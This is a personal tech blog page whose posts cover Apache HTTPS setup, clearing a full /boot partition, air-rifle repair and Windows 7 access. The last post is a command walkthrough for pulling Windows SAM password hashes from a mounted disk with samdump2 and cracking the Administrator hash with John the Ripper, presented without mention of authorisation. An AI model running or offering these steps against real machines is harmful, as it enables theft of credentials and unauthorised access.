Hack windows 7 without tools

Stuck with a windows 7 box but don’t have SYSTEM access? Need access? You don’t need any tools.

 

Much like the Windows NT local privilege escalation trick this is a great way to hack windows 7.

 

Windows NT Local Priv Escalation

VXKNK5M 300x225 Hack windows 7 without tools

Posted in Secuirty | Leave a comment

Enable HTTPS 443 on Apache 2

Capture thumb Enable HTTPS 443 on Apache 2

Generate you SSL cert

mkdir crt
mkdir key
openssl req -new -x509 -days 365 -keyout key/TomSchaefer.key -out crt/TomSchaefer.crt -nodes -subj  ‘/O=TomSchaefer.org/OU=TomSchaefer.org/CN=www.TomSchaefer.org’

This operation will create two files, crt/TomSchaefer.crt and key/TomSchaefer.key, that you will use in your VirtualHost definition to enable SSL encryption using that key.

 

Change your virtualhost config

Open your VirtualHost config file. You should have something along the lines of:

<VirtualHost *>
ServerAdmin webmaster@yourdomain.com
DocumentRoot /var/www/vhost1
ServerName vhost1.yourdomain.com
DirectoryIndex index.php
ErrorLog /var/log/apache2/vhost1-error.log
CustomLog /var/log/apache2/vhost1-access.log combined
<Location />
Options Indexes FollowSymLinks
AllowOverride All
</Location>

</VirtualHost>

Together with the new config, this should look like that:

<VirtualHost *:80>
ServerAdmin webmaster@yourdomain.com
DocumentRoot /var/www/vhost1
ServerName vhost1.yourdomain.com
DirectoryIndex index.php
ErrorLog /var/log/apache2/vhost1-error.log
<Location />
RewriteEngine on
RewriteCond %{HTTPS} off
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R]
</Location>
</VirtualHost>
<VirtualHost *:443>
ServerAdmin webmaster@yourdomain.com
DocumentRoot /var/www/vhost1
ServerName vhost1.yourdomain.com
DirectoryIndex index.php
ErrorLog /var/log/apache2/vhost1-error.log
CustomLog /var/log/apache2/vhost1-access.log combined
SSLEngine On
SSLCertificateFile /etc/apache2/ssl/crt/TomSchaefer.crt
SSLCertificateKeyFile /etc/apache2/ssl/key/TomSchaefer.key
<Location />
SSLRequireSSL On
SSLVerifyClient optional
SSLVerifyDepth 1
SSLOptions +StdEnvVars +StrictRequire
</Location>

</VirtualHost>

 

sudo a2enmod rewrite

sudo a2enmod ssl

sudo /etc/init.d/apache2 restart

 

You may also have to configure apache to listen on 443 by changing your config

listen 443

Debian will have this set by default! Enjoy!

Posted in linux, Secuirty, Web Secuirty | Leave a comment

/boot is full. No space left!

What do you do! You have a dependency not met so every time you try to run apt-get autoremove it fails. /boot has 100% utilization and it’s not looking good.

This is the nightmare I just lived for the past day or so. I thought about how I could solve this issue for a bit, crossed my fingers and tried it. (After I made backups duh!)

 

Find what kernel you’re using

uname –r

This kernel you won’t want to mess with until everything is solved. Make note of this and do not delete.

 

List all installed kernels

dpkg –list ‘linux-image*’

 

Now remove all old kernels

sudo apt-get remove linux-image-2.6.32-40-generic

 

If that fails because /boot still doesn’t have room then you’re going to need to improvise.

cd /boot

rm vmlinuz-2.6.32-40-generic-pae

 

This will get you some temporary room.  See how much room is available and delete more unused files if necessary.

df –h

 

Now that you have some free room remove everything old!

apt-get autoremove

 

User submitted code by Ahmad came up with an awesome trick

dpkg -l 'linux-*' | sed '/^ii/!d;/'"$(uname -r | sed "s/\(.*\)-\([^0-9]\+\)/\1/")"'/d;s/^[^ ]* [^ ]* \([^ ]*\).*/\1/;/[0-9]/!d' | xargs sudo apt-get -y purge

Using apt-get autoremove freed up around 40MB space in my case. However, Ahmad’s script freed up over 1GB of unused crap. Great share!

Posted in Secuirty | Leave a comment

Disassemble gamo Bone Collector IGT

There’s nothing worse then starting to loose FPS without a reason. Just in time for my warranty to lapse. Damn it Gamo….

So I built my own press to disassemble the gamo air rifle. The gas spring doesn’t need that much room but you need a press to install and remove.

After I got the whole thing taken apart and I found some of the worse damage I’ve ever seen on a plunger.

 

IMG 0276 thumb Disassemble gamo Bone Collector IGTIMG 0278 thumb Disassemble gamo Bone Collector IGTIMG 0279 thumb Disassemble gamo Bone Collector IGT

The Press isn’t hard to make. Just need some wood and some time. I used a 1/2 inch bolt to press the gas piston to uninstall and install. On the Bone Collector model you must remove the reset wire on the trigger group before going too far.

Posted in Secuirty | Leave a comment

Crack windows 7 password

1. Boot the system with backtrack4 and wait for the operating system to load. Use "startx" command to get the desktop. 2. Open the Konsole and use the command "fdisk -l" to know the details of your partition. The partition sda stands for sata type and hda stands for ide. 3. Create a directory say

  "mkdir /mnt/sda2"

4. Mount your device parition to the directory

  "mount -t ntfs /dev/sda2 /mnt/sda2"

where /dev/sda2 is the your windows7 operating system partition. 5. change the directory to the location "SAM" file where the passwords hashes of windows operating system is present.

  "cd /mnt/sda2/Windows/System32/config"

6. Use the tool "Samdump" to move the hashes from the SAM file to the file "pass1"

  "samdump2 system sam > /root/pass1"

7. using the "grep" command search the Administrator hash in the file and write it to another file "pass2"

  "cat /root/pass1 | grep Administrator > /root/pass2"

8. Change the directory to /pentest/password/jtr

   "cd /pentest/passwords/jtr"

9. Type ./john to see the format and various options of cracking. 10. Here windows use the NTLM hash so we use the following command to crack it.

   "./john --format=NT /root/pass2"
Posted in Secuirty | Leave a comment
  • Welcome to TomSchaefer.org